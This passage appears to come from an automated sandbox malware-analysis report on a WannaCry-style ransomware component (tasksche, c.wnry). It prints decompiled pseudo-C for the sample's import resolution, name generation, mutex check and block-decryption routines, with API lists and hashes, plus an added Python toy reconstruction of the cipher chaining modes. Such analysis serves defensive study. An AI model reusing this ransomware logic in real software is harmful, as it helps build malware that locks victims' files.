                    				signed int _t63;
                    				signed int _t67;
                    				intOrPtr _t68;
                    				void* _t73;
                    				signed int _t75;
                    				intOrPtr _t87;
                    				intOrPtr* _t88;
                    				intOrPtr* _t90;
                    				void* _t91;
                    
                    				_t90 = _a4;
                    				_t2 = _t90 + 4; // 0x4be8563c
                    				_t87 =  *_t2;
                    				_t50 =  *_t90 + 0x80;
                    				_t75 = 1;
                    				_v16 = _t87;
                    				_v12 = _t75;
                    				if( *((intOrPtr*)(_t50 + 4)) != 0) {
                    					_t73 =  *_t50 + _t87;
                    					if(IsBadReadPtr(_t73, 0x14) != 0) {
                    						L25:
                    						return _v12;
                    					}
                    					while(1) {
                    						_t53 =  *((intOrPtr*)(_t73 + 0xc));
                    						if(_t53 == 0) {
                    							goto L25;
                    						}
                    						_t8 = _t90 + 0x30; // 0xc085d0ff
                    						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
                    						_v8 = _t55;
                    						if(_t55 == 0) {
                    							SetLastError(0x7e);
                    							L23:
                    							_v12 = _v12 & 0x00000000;
                    							goto L25;
                    						}
                    						_t11 = _t90 + 0xc; // 0x317459c0
                    						_t14 = _t90 + 8; // 0x85000001
                    						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
                    						if(_t58 == 0) {
                    							_t40 = _t90 + 0x30; // 0xc085d0ff
                    							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
                    							SetLastError(0xe);
                    							goto L23;
                    						}
                    						_t15 = _t90 + 0xc; // 0x317459c0
                    						 *(_t90 + 8) = _t58;
                    						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
                    						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
                    						_t60 =  *_t73;
                    						if(_t60 == 0) {
                    							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
                    							_a4 = _t88;
                    						} else {
                    							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
                    							_a4 = _t60 + _t87;
                    						}
                    						while(1) {
                    							_t63 =  *_a4;
                    							if(_t63 == 0) {
                    								break;
                    							}
                    							if((_t63 & 0x80000000) == 0) {
                    								_t32 = _t90 + 0x30; // 0xc085d0ff
                    								_push( *_t32);
                    								_t67 = _t63 + _v16 + 2;
                    							} else {
                    								_t30 = _t90 + 0x30; // 0xc085d0ff
                    								_push( *_t30);
                    								_t67 = _t63 & 0x0000ffff;
                    							}
                    							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
                    							_t91 = _t91 + 0xc;
                    							 *_t88 = _t68;
                    							if(_t68 == 0) {
                    								_v12 = _v12 & 0x00000000;
                    								break;
                    							} else {
                    								_a4 =  &(_a4[1]);
                    								_t88 = _t88 + 4;
                    								continue;
                    							}
                    						}
                    						if(_v12 == 0) {
                    							_t45 = _t90 + 0x30; // 0xc085d0ff
                    							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
                    							SetLastError(0x7f);
                    							goto L25;
                    						}
                    						_t73 = _t73 + 0x14;
                    						if(IsBadReadPtr(_t73, 0x14) == 0) {
                    							_t87 = _v16;
                    							continue;
                    						}
                    						goto L25;
                    					}
                    					goto L25;
                    				}
                    				return _t75;
                    			}

                    0x004027e6
                    0x004027ee
                    0x004027ee
                    0x004027f1
                    0x004027f6
                    0x004027f7
                    0x004027fa
                    0x00402801
                    0x0040280d
                    0x0040281a
                    0x0040291c
                    0x00000000
                    0x0040291f
                    0x00402825
                    0x00402825
                    0x0040282a
                    0x00000000
                    0x00000000
                    0x00402830
                    0x00402836
                    0x0040283a
                    0x00402840
                    0x004028fd
                    0x004028fd
                    0x00402903
                    0x00000000
                    0x00402903
                    0x00402846
                    0x00402851
                    0x00402854
                    0x0040285e
                    0x004028f0
                    0x004028f6
                    0x004028fd
                    0x00000000
                    0x004028fd
                    0x00402864
                    0x0040286a
                    0x0040286d
                    0x00402870
                    0x00402873
                    0x00402877
                    0x00402889
                    0x0040288b
                    0x00402879
                    0x0040287e
                    0x00402881
                    0x00402881
                    0x0040288e
                    0x00402891
                    0x00402895
                    0x00000000
                    0x00000000
                    0x0040289c
                    0x004028ab
                    0x004028ab
                    0x004028b0
                    0x0040289e
                    0x0040289e
                    0x0040289e
                    0x004028a1
                    0x004028a1
                    0x004028b7
                    0x004028ba
                    0x004028bd
                    0x004028c1
                    0x004028cc
                    0x00000000
                    0x004028c3
                    0x004028c3
                    0x004028c7
                    0x00000000
                    0x004028c7
                    0x004028c1
                    0x004028d4
                    0x00402909
                    0x0040290f
                    0x00402916
                    0x00000000
                    0x00402916
                    0x004028d6
                    0x004028e4
                    0x00402822
                    0x00000000
                    0x00402822
                    0x00000000
                    0x004028ea
                    0x00000000
                    0x00402825
                    0x00000000

                    APIs
                    • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                    • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                    • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Read$realloc
                    • String ID: ?!@
                    • API String ID: 1241503663-708128716
                    • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                    • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                    • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                    • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00401225(intOrPtr _a4) {
                    				signed int _v8;
                    				long _v12;
                    				void _v410;
                    				long _v412;
                    				long _t34;
                    				signed int _t42;
                    				intOrPtr _t44;
                    				signed int _t45;
                    				signed int _t48;
                    				int _t54;
                    				signed int _t56;
                    				signed int _t60;
                    				signed int _t61;
                    				signed int _t62;
                    				void* _t71;
                    				signed short* _t72;
                    				void* _t76;
                    				void* _t77;
                    
                    				_t34 =  *0x40f874; // 0x0
                    				_v412 = _t34;
                    				_t56 = 0x63;
                    				_v12 = 0x18f;
                    				memset( &_v410, 0, _t56 << 2);
                    				asm("stosw");
                    				GetComputerNameW( &_v412,  &_v12);
                    				_v8 = _v8 & 0x00000000;
                    				_t54 = 1;
                    				if(wcslen( &_v412) > 0) {
                    					_t72 =  &_v412;
                    					do {
                    						_t54 = _t54 * ( *_t72 & 0x0000ffff);
                    						_v8 = _v8 + 1;
                    						_t72 =  &(_t72[1]);
                    					} while (_v8 < wcslen( &_v412));
                    				}
                    				srand(_t54);
                    				_t42 = rand();
                    				_t71 = 0;
                    				asm("cdq");
                    				_t60 = 8;
                    				_t76 = _t42 % _t60 + _t60;
                    				if(_t76 > 0) {
                    					do {
                    						_t48 = rand();
                    						asm("cdq");
                    						_t62 = 0x1a;
                    						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
                    						_t71 = _t71 + 1;
                    					} while (_t71 < _t76);
                    				}
                    				_t77 = _t76 + 3;
                    				while(_t71 < _t77) {
                    					_t45 = rand();
                    					asm("cdq");
                    					_t61 = 0xa;
                    					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
                    					_t71 = _t71 + 1;
                    				}
                    				_t44 = _a4;
                    				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
                    				return _t44;
                    			}

                    0x0040122e
                    0x00401239
                    0x00401240
                    0x00401249
                    0x00401250
                    0x00401252
                    0x0040125f
                    0x0040126b
                    0x00401277
                    0x0040127e
                    0x00401280
                    0x00401286
                    0x00401289
                    0x0040128c
                    0x00401297
                    0x0040129d
                    0x00401286
                    0x004012a1
                    0x004012ae
                    0x004012b2
                    0x004012b4
                    0x004012b5
                    0x004012ba
                    0x004012be
                    0x004012c0
                    0x004012c0
                    0x004012c4
                    0x004012c5
                    0x004012ce
                    0x004012d1
                    0x004012d2
                    0x004012c0
                    0x004012d6
                    0x004012d9
                    0x004012dd
                    0x004012e1
                    0x004012e2
                    0x004012eb
                    0x004012ee
                    0x004012ee
                    0x004012f1
                    0x004012f4
                    0x004012fc

                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: rand$wcslen$ComputerNamesrand
                    • String ID:
                    • API String ID: 3058258771-0
                    • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                    • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                    • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                    • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00407070(char* _a4, char* _a8) {
                    				char _v264;
                    				void _v524;
                    				long _t16;
                    				char* _t30;
                    				char* _t31;
                    				char* _t36;
                    				char* _t38;
                    				int _t40;
                    				void* _t41;
                    
                    				_t30 = _a4;
                    				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
                    					CreateDirectoryA(_t30, 0);
                    				}
                    				_t36 = _a8;
                    				_t16 =  *_t36;
                    				if(_t16 != 0) {
                    					_t38 = _t36;
                    					_t31 = _t36;
                    					do {
                    						if(_t16 == 0x2f || _t16 == 0x5c) {
                    							_t38 = _t31;
                    						}
                    						_t16 = _t31[1];
                    						_t31 =  &(_t31[1]);
                    					} while (_t16 != 0);
                    					if(_t38 != _t36) {
                    						_t40 = _t38 - _t36;
                    						memcpy( &_v524, _t36, _t40);
                    						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
                    						E00407070(_t30,  &_v524);
                    					}
                    					_v264 = _v264 & 0x00000000;
                    					if(_t30 != 0) {
                    						strcpy( &_v264, _t30);
                    					}
                    					strcat( &_v264, _t36);
                    					_t16 = GetFileAttributesA( &_v264);
                    					if(_t16 == 0xffffffff) {
                    						return CreateDirectoryA( &_v264, 0);
                    					}
                    				}
                    				return _t16;
                    			}

                    0x0040707a
                    0x00407080
                    0x00407091
                    0x00407091
                    0x00407097
                    0x0040709a
                    0x0040709e
                    0x004070a5
                    0x004070a7
                    0x004070a9
                    0x004070ab
                    0x004070b1
                    0x004070b1
                    0x004070b3
                    0x004070b6
                    0x004070b7
                    0x004070bd
                    0x004070bf
                    0x004070ca
                    0x004070cf
                    0x004070df
                    0x004070e4
                    0x004070e7
                    0x004070f1
                    0x004070fb
                    0x00407101
                    0x0040710a
                    0x00407118
                    0x00407121
                    0x00000000
                    0x0040712c
                    0x00407121
                    0x00407135

                    APIs
                    • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                    • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                    • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                    • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                    • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                    • String ID:
                    • API String ID: 2935503933-0
                    • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                    • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                    • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                    • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00401EFF(intOrPtr _a4) {
                    				char _v104;
                    				void* _t9;
                    				void* _t11;
                    				void* _t12;
                    
                    				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
                    				_t12 = 0;
                    				if(_a4 <= 0) {
                    					L3:
                    					return 0;
                    				} else {
                    					goto L1;
                    				}
                    				while(1) {
                    					L1:
                    					_t9 = OpenMutexA(0x100000, 1,  &_v104);
                    					if(_t9 != 0) {
                    						break;
                    					}
                    					Sleep(0x3e8);
                    					_t12 = _t12 + 1;
                    					if(_t12 < _a4) {
                    						continue;
                    					}
                    					goto L3;
                    				}
                    				CloseHandle(_t9);
                    				_t11 = 1;
                    				return _t11;
                    			}

                    0x00401f16
                    0x00401f1c
                    0x00401f24
                    0x00401f4c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401f26
                    0x00401f26
                    0x00401f31
                    0x00401f39
                    0x00000000
                    0x00000000
                    0x00401f40
                    0x00401f46
                    0x00401f4a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401f4a
                    0x00401f52
                    0x00401f5a
                    0x00000000

                    APIs
                    • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                    • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                    • Sleep.KERNEL32(000003E8), ref: 00401F40
                    • CloseHandle.KERNEL32(00000000), ref: 00401F52
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleMutexOpenSleepsprintf
                    • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                    • API String ID: 2780352083-2959021817
                    • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                    • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                    • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                    • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				void* _v12;
                    				char _v16;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v48;
                    				signed int _t121;
                    				int _t124;
                    				intOrPtr* _t126;
                    				intOrPtr _t127;
                    				int _t131;
                    				intOrPtr* _t133;
                    				intOrPtr _t135;
                    				intOrPtr _t137;
                    				signed int _t139;
                    				signed int _t140;
                    				signed int _t143;
                    				signed int _t150;
                    				intOrPtr _t160;
                    				int _t161;
                    				int _t163;
                    				signed int _t164;
                    				signed int _t165;
                    				intOrPtr _t168;
                    				void* _t169;
                    				signed int _t170;
                    				signed int _t172;
                    				signed int _t175;
                    				signed int _t178;
                    				intOrPtr _t194;
                    				void* _t195;
                    				void* _t196;
                    				void* _t197;
                    				intOrPtr _t198;
                    				void* _t201;
                    
                    				_t197 = __ecx;
                    				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                    					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                    					_push(0x40d570);
                    					_push( &_v16);
                    					L0040776E();
                    				}
                    				_t121 = _a12;
                    				if(_t121 == 0) {
                    					L15:
                    					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
                    					_push(0x40d570);
                    					_push( &_v16);
                    					L0040776E();
                    					_push( &_v16);
                    					_push(0);
                    					_push(_t197);
                    					_t198 = _v36;
                    					_t194 = _v32;
                    					_t168 =  *((intOrPtr*)(_t198 + 0x30));
                    					_t160 =  *((intOrPtr*)(_t198 + 0x34));
                    					_t71 = _t194 + 0xc; // 0x40d568
                    					_v48 =  *_t71;
                    					_v32 = _t168;
                    					if(_t168 > _t160) {
                    						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
                    					}
                    					_t75 = _t194 + 0x10; // 0x19930520
                    					_t124 =  *_t75;
                    					_t161 = _t160 - _t168;
                    					if(_t161 > _t124) {
                    						_t161 = _t124;
                    					}
                    					if(_t161 != 0 && _a8 == 0xfffffffb) {
                    						_a8 = _a8 & 0x00000000;
                    					}
                    					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
                    					 *(_t194 + 0x10) = _t124 - _t161;
                    					_t126 =  *((intOrPtr*)(_t198 + 0x38));
                    					if(_t126 != 0) {
                    						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
                    						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
                    						_t201 = _t201 + 0xc;
                    						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
                    					}
                    					if(_t161 != 0) {
                    						memcpy(_v12, _a4, _t161);
                    						_v12 = _v12 + _t161;
                    						_t201 = _t201 + 0xc;
                    						_a4 = _a4 + _t161;
                    					}
                    					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
                    					if(_a4 == _t127) {
                    						_t169 =  *((intOrPtr*)(_t198 + 0x28));
                    						_a4 = _t169;
                    						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
                    							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
                    						}
                    						_t99 = _t194 + 0x10; // 0x19930520
                    						_t131 =  *_t99;
                    						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
                    						if(_t163 > _t131) {
                    							_t163 = _t131;
                    						}
                    						if(_t163 != 0 && _a8 == 0xfffffffb) {
                    							_a8 = _a8 & 0x00000000;
                    						}
                    						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
                    						 *(_t194 + 0x10) = _t131 - _t163;
                    						_t133 =  *((intOrPtr*)(_t198 + 0x38));
                    						if(_t133 != 0) {
                    							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
                    							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
                    							_t201 = _t201 + 0xc;
                    							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
                    						}
                    						if(_t163 != 0) {
                    							memcpy(_v12, _a4, _t163);
                    							_v12 = _v12 + _t163;
                    							_a4 = _a4 + _t163;
                    						}
                    					}
                    					 *(_t194 + 0xc) = _v12;
                    					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
                    					return _a8;
                    				} else {
                    					_t170 =  *(_t197 + 0x3cc);
                    					if(_t121 % _t170 != 0) {
                    						goto L15;
                    					} else {
                    						if(_a16 != 1) {
                    							_t195 = _a4;
                    							_t139 = _a12;
                    							_a16 = 0;
                    							_t164 = _a8;
                    							if(_a16 != 2) {
                    								_t140 = _t139 / _t170;
                    								if(_t140 > 0) {
                    									do {
                    										E00403797(_t197, _t195, _t164);
                    										_t172 =  *(_t197 + 0x3cc);
                    										_t195 = _t195 + _t172;
                    										_t143 = _a12 / _t172;
                    										_t164 = _t164 + _t172;
                    										_a16 = _a16 + 1;
                    									} while (_a16 < _t143);
                    									return _t143;
                    								}
                    							} else {
                    								_t140 = _t139 / _t170;
                    								if(_t140 > 0) {
                    									do {
                    										E0040350F(_t197, _t197 + 0x3f0, _t164);
                    										E00403A28(_t197, _t164, _t195);
                    										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
                    										_t175 =  *(_t197 + 0x3cc);
                    										_t201 = _t201 + 0xc;
                    										_t150 = _a12 / _t175;
                    										_t195 = _t195 + _t175;
                    										_t164 = _t164 + _t175;
                    										_a16 = _a16 + 1;
                    									} while (_a16 < _t150);
                    									return _t150;
                    								}
                    							}
                    						} else {
                    							_t196 = _a4;
                    							_t140 = _a12 / _t170;
                    							_a16 = 0;
                    							_t165 = _a8;
                    							if(_t140 > 0) {
                    								do {
                    									E00403797(_t197, _t196, _t165);
                    									E00403A28(_t197, _t165, _t197 + 0x3f0);
                    									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
                    									_t178 =  *(_t197 + 0x3cc);
                    									_t201 = _t201 + 0xc;
                    									_t140 = _a12 / _t178;
                    									_t196 = _t196 + _t178;
                    									_t165 = _t165 + _t178;
                    									_a16 = _a16 + 1;
                    								} while (_a16 < _t140);
                    							}
                    						}
                    						return _t140;
                    					}
                    				}
                    			}

                    Instruction addresses for the listing above: 0x00403a7f to 0x00403cc7 (address column, one entry per decompiled line)

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID:
                    • API String ID: 2382887404-0
                    • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                    • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                    • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                    • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                    Uniqueness

                    Uniqueness Score: -1.00%
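The three loops in the listing above share one shape. The input length is first checked against the block size kept at ctx+0x3cc (a remainder reaches the exception throw); then mode 0 applies E00403797 to each block on its own, mode 1 applies E00403797 and combines the result through E00403A28 with the block saved at ctx+0x3f0 before copying the current input there, and mode 2 runs E0040350F on the saved block, combines it with the current input, and again saves the input. The `_a16` slot holds the mode on entry and is reused as the loop counter after the mode test, which is why the decompiler shows it being zeroed right before a compare against 2. If E00403797 is the block decryption, E0040350F the block encryption and E00403A28 a block XOR, these are ECB, CBC and CFB decryption; the report does not state that, so it is an inference. The example below is added here and is not the sample's code: it reproduces the three chaining patterns over a constructed toy block function (not the sample's cipher) so each mode can be round-tripped, with the length check mapped to an exception.

```python
TOY_BLOCK = 8   # stands in for the block size the sample keeps at ctx+0x3cc


def xor_block(a, b):
    """XOR two equal-length blocks (the role E00403A28 appears to play)."""
    return bytes(x ^ y for x, y in zip(a, b))


def toy_encrypt(key, block):
    """Constructed invertible block function: rotate left one byte, then XOR the key.
    Not the sample's cipher; it only needs to be a bijection for the modes to round-trip."""
    return xor_block(block[1:] + block[:1], key)


def toy_decrypt(key, block):
    x = xor_block(block, key)
    return x[-1:] + x[:-1]


def decrypt_blocks(key, iv, data, mode):
    """Mirror of the three loops: mode 0 = ECB, 1 = CBC, 2 = CFB (decryption direction).
    `iv` plays the part of the block stored at ctx+0x3f0 on entry."""
    if len(data) % TOY_BLOCK:
        # the sample throws a C++ exception here (??0exception / _CxxThrowException)
        raise ValueError("length is not a multiple of the block size")
    prev, out = iv, bytearray()
    for off in range(0, len(data), TOY_BLOCK):
        blk = data[off:off + TOY_BLOCK]
        if mode == 0:
            out += toy_decrypt(key, blk)
        elif mode == 1:
            out += xor_block(toy_decrypt(key, blk), prev)   # D(C_i) ^ C_{i-1}
            prev = blk
        elif mode == 2:
            out += xor_block(toy_encrypt(key, prev), blk)   # E(C_{i-1}) ^ C_i
            prev = blk
        else:
            raise ValueError("unknown mode")
    return bytes(out)


def encrypt_blocks(key, iv, data, mode):
    """Forward direction, added only to produce inputs for decrypt_blocks."""
    if len(data) % TOY_BLOCK:
        raise ValueError("length is not a multiple of the block size")
    prev, out = iv, bytearray()
    for off in range(0, len(data), TOY_BLOCK):
        blk = data[off:off + TOY_BLOCK]
        if mode == 0:
            c = toy_encrypt(key, blk)
        elif mode == 1:
            c = toy_encrypt(key, xor_block(blk, prev))
        elif mode == 2:
            c = xor_block(toy_encrypt(key, prev), blk)
        else:
            raise ValueError("unknown mode")
        out += c
        prev = c
    return bytes(out)
```

When identifying such a routine in another sample, the tell-tale is which block is saved into the chaining slot after each iteration: the input (as here, a decryption routine) or the output (an encryption routine).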

                    APIs
                    • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                    • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                    • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                    • fclose.MSVCRT(00000000), ref: 00401058
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: fclosefopenfreadfwrite
                    • String ID: c.wnry
                    • API String ID: 4000964834-3240288721
                    • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                    • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                    • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                    • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 24%
                    			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                    				struct _OVERLAPPED* _v8;
                    				char _v20;
                    				long _v32;
                    				struct _OVERLAPPED* _v36;
                    				long _v40;
                    				signed int _v44;
                    				void* _t18;
                    				void* _t28;
                    				long _t34;
                    				intOrPtr _t38;
                    
                    				_push(0xffffffff);
                    				_push(0x4081f0);
                    				_push(0x4076f4);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t38;
                    				_v44 = _v44 | 0xffffffff;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v8 = 0;
                    				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
